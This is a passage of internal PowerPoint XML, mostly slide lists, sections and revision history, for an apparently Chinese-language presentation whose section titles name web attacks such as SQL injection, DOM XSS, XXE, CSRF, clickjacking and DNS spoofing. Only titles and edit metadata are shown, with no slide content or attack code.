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83"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="322" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="317" r:id="rId8"/>
    <p:sldId id="321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87" r:id="rId24"/>
    <p:sldId id="288" r:id="rId25"/>
    <p:sldId id="289" r:id="rId26"/>
    <p:sldId id="276" r:id="rId27"/>
    <p:sldId id="275" r:id="rId28"/>
    <p:sldId id="277" r:id="rId29"/>
    <p:sldId id="278" r:id="rId30"/>
    <p:sldId id="335" r:id="rId31"/>
    <p:sldId id="336" r:id="rId32"/>
    <p:sldId id="310" r:id="rId33"/>
    <p:sldId id="311" r:id="rId34"/>
    <p:sldId id="30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91" r:id="rId44"/>
    <p:sldId id="290" r:id="rId45"/>
    <p:sldId id="292" r:id="rId46"/>
    <p:sldId id="293" r:id="rId47"/>
    <p:sldId id="294" r:id="rId48"/>
    <p:sldId id="295" r:id="rId49"/>
    <p:sldId id="318" r:id="rId50"/>
    <p:sldId id="296" r:id="rId51"/>
    <p:sldId id="297" r:id="rId52"/>
    <p:sldId id="298" r:id="rId53"/>
    <p:sldId id="319" r:id="rId54"/>
    <p:sldId id="299" r:id="rId55"/>
    <p:sldId id="305" r:id="rId56"/>
    <p:sldId id="300" r:id="rId57"/>
    <p:sldId id="301" r:id="rId58"/>
    <p:sldId id="320" r:id="rId59"/>
    <p:sldId id="307" r:id="rId60"/>
    <p:sldId id="306" r:id="rId61"/>
    <p:sldId id="337" r:id="rId62"/>
    <p:sldId id="315" r:id="rId63"/>
    <p:sldId id="312" r:id="rId64"/>
    <p:sldId id="309" r:id="rId65"/>
    <p:sldId id="316" r:id="rId66"/>
    <p:sldId id="313" r:id="rId67"/>
    <p:sldId id="314" r:id="rId68"/>
    <p:sldId id="323" r:id="rId69"/>
    <p:sldId id="325" r:id="rId70"/>
    <p:sldId id="324" r:id="rId71"/>
    <p:sldId id="327" r:id="rId72"/>
    <p:sldId id="326" r:id="rId73"/>
    <p:sldId id="329" r:id="rId74"/>
    <p:sldId id="328" r:id="rId75"/>
    <p:sldId id="330" r:id="rId76"/>
    <p:sldId id="332" r:id="rId77"/>
    <p:sldId id="331" r:id="rId78"/>
    <p:sldId id="303" r:id="rId79"/>
    <p:sldId id="333" r:id="rId80"/>
    <p:sldId id="334" r:id="rId81"/>
    <p:sldId id="304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" id="{F3AFACDE-4A96-CC45-8CCB-FA6424E3DB47}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="目錄" id="{2E5B54FA-33A8-484A-8163-16414691621D}">
          <p14:sldIdLst>
            <p14:sldId id="322"/>
            <p14:sldId id="257"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="系統架構與資料庫設計" id="{4514398C-EB99-3D4B-9C29-27267CB286BF}">
          <p14:sldIdLst>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
            <p14:sldId id="317"/>
            <p14:sldId id="321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UNION ATTACK" id="{993914F7-761D-6240-8E64-58A8C94CB35E}">
          <p14:sldIdLst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Blind SQL Injection" id="{B3E0D1F4-CDFE-544E-91B4-1C996193376A}">
          <p14:sldIdLst>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="289"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="DOM XSS" id="{E794FDBD-FEE0-6249-8EFE-694918E85A7F}">
          <p14:sldIdLst>
            <p14:sldId id="276"/>
            <p14:sldId id="275"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="335"/>
            <p14:sldId id="336"/>
            <p14:sldId id="310"/>
            <p14:sldId id="311"/>
            <p14:sldId id="308"/>
            <p14:sldId id="279"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="XXE INJECTION" id="{82ABCD8A-0D75-E74F-A39F-A7C8058BCF6E}">
          <p14:sldIdLst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任意檔案上傳" id="{C46B3D55-8E7C-F14A-82B5-51F92A588EEE}">
          <p14:sldIdLst>
            <p14:sldId id="291"/>
            <p14:sldId id="290"/>
            <p14:sldId id="292"/>
            <p14:sldId id="293"/>
            <p14:sldId id="294"/>
            <p14:sldId id="295"/>
            <p14:sldId id="318"/>
            <p14:sldId id="296"/>
            <p14:sldId id="297"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="CSRF" id="{7EDC156C-43CE-DF48-B6BE-FAFFCAFEB663}">
          <p14:sldIdLst>
            <p14:sldId id="298"/>
            <p14:sldId id="319"/>
            <p14:sldId id="299"/>
            <p14:sldId id="305"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Clickjacking" id="{76BC7CF4-A9A3-B346-9916-0465AE5A994D}">
          <p14:sldIdLst>
            <p14:sldId id="300"/>
            <p14:sldId id="301"/>
            <p14:sldId id="320"/>
            <p14:sldId id="307"/>
            <p14:sldId id="306"/>
            <p14:sldId id="337"/>
            <p14:sldId id="315"/>
            <p14:sldId id="312"/>
            <p14:sldId id="309"/>
            <p14:sldId id="316"/>
            <p14:sldId id="313"/>
            <p14:sldId id="314"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="DNS Spoofing" id="{3F0B9AFF-D79A-9743-A962-A70311AF0B85}">
          <p14:sldIdLst>
            <p14:sldId id="323"/>
            <p14:sldId id="325"/>
            <p14:sldId id="324"/>
            <p14:sldId id="327"/>
            <p14:sldId id="326"/>
            <p14:sldId id="329"/>
            <p14:sldId id="328"/>
            <p14:sldId id="330"/>
            <p14:sldId id="332"/>
            <p14:sldId id="331"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="文戲參考" id="{98B8EFE8-068D-9948-9505-B2BEA55AA7A5}">
          <p14:sldIdLst>
            <p14:sldId id="303"/>
            <p14:sldId id="333"/>
            <p14:sldId id="334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5BC5A-C9A0-BC44-9BAC-6601BA038857}" v="252" dt="2023-06-16T08:16:13.819"/>
    <p1510:client id="{2924D72D-DEC0-474D-8E70-C74212593B2A}" v="5" dt="2023-06-15T19:55:18.78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0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98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昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd addSection modSection">
      <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-16T11:31:04.419" v="6834" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T03:41:37.092" v="6754" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2699619621" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T03:41:37.092" v="6754" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2699619621" sldId="257"/>
            <ac:spMk id="3" creationId="{4A7817F5-DF46-C485-1DFB-9A838BCFB334}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T05:58:38.751" v="5744" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2699619621" sldId="257"/>
            <ac:spMk id="5" creationId="{3C52E3B3-8287-1C6E-1114-F1588ED21FF7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T05:56:48.102" v="5670" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2699619621" sldId="257"/>
            <ac:picMk id="4" creationId="{8CC437BF-3510-EFF5-D5B0-6506565AA223}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:46:14.010" v="229" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3606324302" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:44:35.764" v="205" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3606324302" sldId="259"/>
            <ac:spMk id="5" creationId="{403E88AC-A3F7-9A16-0D05-58DCCF069B97}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:43:46.376" v="199" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3606324302" sldId="259"/>
            <ac:spMk id="7" creationId="{C19EB05B-4F51-D7E7-5002-730CB666091E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:46:14.010" v="229" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3606324302" sldId="259"/>
            <ac:spMk id="9" creationId="{FC8136F9-50DC-550C-9792-C5245DB14350}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:43:26.229" v="168" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3606324302" sldId="259"/>
            <ac:picMk id="6" creationId="{4708361C-D79D-4D36-2055-35A2C90B8E03}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:46:02.239" v="207" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3606324302" sldId="259"/>
            <ac:picMk id="8" creationId="{E94E646A-D17D-46F4-BEA3-D93700533C7C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T03:46:30.725" v="6757" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3771669125" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:47:40.418" v="251" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3771669125" sldId="260"/>
            <ac:spMk id="2" creationId="{42B427D3-F2C1-C898-CEA5-69F704C81A40}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T03:46:30.725" v="6757" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3771669125" sldId="260"/>
            <ac:spMk id="3" creationId="{BBE2FA8D-9C6C-6A15-4330-D62545A91DCA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:57:43.054" v="432" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3771669125" sldId="260"/>
            <ac:spMk id="5" creationId="{39608BFF-6965-204B-A862-C800BCA06A6C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:57:25.428" v="427" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3771669125" sldId="260"/>
            <ac:spMk id="7" creationId="{AF22F400-8654-215B-23EB-B97947E89FFA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:00:13.334" v="597" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="833593057" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T04:59:05.997" v="572" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="833593057" sldId="261"/>
            <ac:spMk id="2" creationId="{ECAA27B7-906F-E3D3-41E3-82587973C12F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:00:13.334" v="597" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="833593057" sldId="261"/>
            <ac:spMk id="4" creationId="{288E0C38-330F-E4FC-86AA-7B7BE5C60552}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:00:00.925" v="574" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="833593057" sldId="261"/>
            <ac:picMk id="3" creationId="{6DC651E5-FE4C-6291-6C38-A7F587D86DF3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:56:57.394" v="891" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2516090667" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:03:38.326" v="702" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2516090667" sldId="262"/>
            <ac:spMk id="2" creationId="{9969273D-0340-2676-7C40-0340B2A81CD7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:03:40.736" v="703" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2516090667" sldId="262"/>
            <ac:spMk id="4" creationId="{9D4053E8-B2CD-7E3B-9A18-B2607C59E793}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:56:57.394" v="891" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2516090667" sldId="262"/>
            <ac:spMk id="5" creationId="{ECC2209E-36CA-46FF-16D2-51759A05DA48}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:55:05.801" v="753" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2516090667" sldId="262"/>
            <ac:picMk id="3" creationId="{C49FFE2C-0E42-96BB-0DD5-048EC4743D18}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:02:01.745" v="1168" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2793494847" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:03:45.984" v="710" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2793494847" sldId="263"/>
            <ac:spMk id="2" creationId="{01D221B9-6B43-1257-8575-D7A39F4C6DC9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:02:01.745" v="1168" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2793494847" sldId="263"/>
            <ac:spMk id="4" creationId="{195E3ECE-60C7-FE2A-B8A9-157E8B5594CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:56:18.896" v="822" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2793494847" sldId="263"/>
            <ac:picMk id="3" creationId="{2306D299-4B7C-E042-C8E4-FE4F0262BD15}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:57:08.131" v="892" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1027668320" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:04:01.339" v="735" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1027668320" sldId="264"/>
            <ac:spMk id="2" creationId="{A5A47A5F-0FDA-3B24-E953-C44356D91275}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:56:13.470" v="821" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1027668320" sldId="264"/>
            <ac:spMk id="4" creationId="{C1CACB27-DFF1-50AD-831F-F3CA9C6BA7DD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:57:08.131" v="892" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1027668320" sldId="264"/>
            <ac:picMk id="3" creationId="{770303AA-6EA6-20CA-A5E7-43383246CA84}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:06:34.666" v="1315" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="639019371" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:04:07.031" v="740" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="639019371" sldId="265"/>
            <ac:spMk id="2" creationId="{5879A552-49D8-4B19-CD72-114E5CCA439F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:06:34.666" v="1315" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="639019371" sldId="265"/>
            <ac:spMk id="4" creationId="{8B1DDDA7-2D96-4374-7B5E-0E96D09704F0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:01:21.668" v="1113" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="639019371" sldId="265"/>
            <ac:spMk id="6" creationId="{5CD68EA2-CAEB-168C-47C3-D0CB7982CD2F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:05:57.369" v="1307" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="639019371" sldId="265"/>
            <ac:picMk id="3" creationId="{2083CB3B-5A5D-FB8D-EEDA-0E6BCACD9768}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:21:53.861" v="1670" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3615255205" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T05:04:21.077" v="752" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3615255205" sldId="266"/>
            <ac:spMk id="2" creationId="{272CFA4E-3F7C-0C12-EB92-F02501F1047D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:05:38.403" v="1304" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3615255205" sldId="266"/>
            <ac:spMk id="4" creationId="{203CA2CE-D5A0-7353-A92F-F926E2CB7CC6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:21:47.827" v="1669" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3615255205" sldId="266"/>
            <ac:spMk id="5" creationId="{85EAB136-6401-B892-CB4E-64BC9AF6F931}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:21:53.861" v="1670" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3615255205" sldId="266"/>
            <ac:picMk id="3" creationId="{50828274-8339-3161-2578-0E2F23947D2F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:28:10.498" v="1850" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1485195475" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:28:10.498" v="1850" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1485195475" sldId="267"/>
            <ac:spMk id="2" creationId="{A009900E-8EB7-7079-C03C-3D6608067F07}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:25:29.691" v="1706" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1485195475" sldId="267"/>
            <ac:spMk id="5" creationId="{4884F85D-A7E5-2EC8-3F8A-7026BF700769}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T06:25:37.723" v="1708" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1485195475" sldId="267"/>
            <ac:picMk id="3" creationId="{A4AB65F3-5B7A-0E93-CD23-C6525FC338E1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:31:12.555" v="1884" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="525430885" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:31:12.555" v="1884" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="525430885" sldId="268"/>
            <ac:spMk id="5" creationId="{4D7FF71D-8D74-2726-08B3-9C4C8AAD7F63}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:28:01.457" v="1843" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3063557767" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-05T07:28:01.457" v="1843" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3063557767" sldId="269"/>
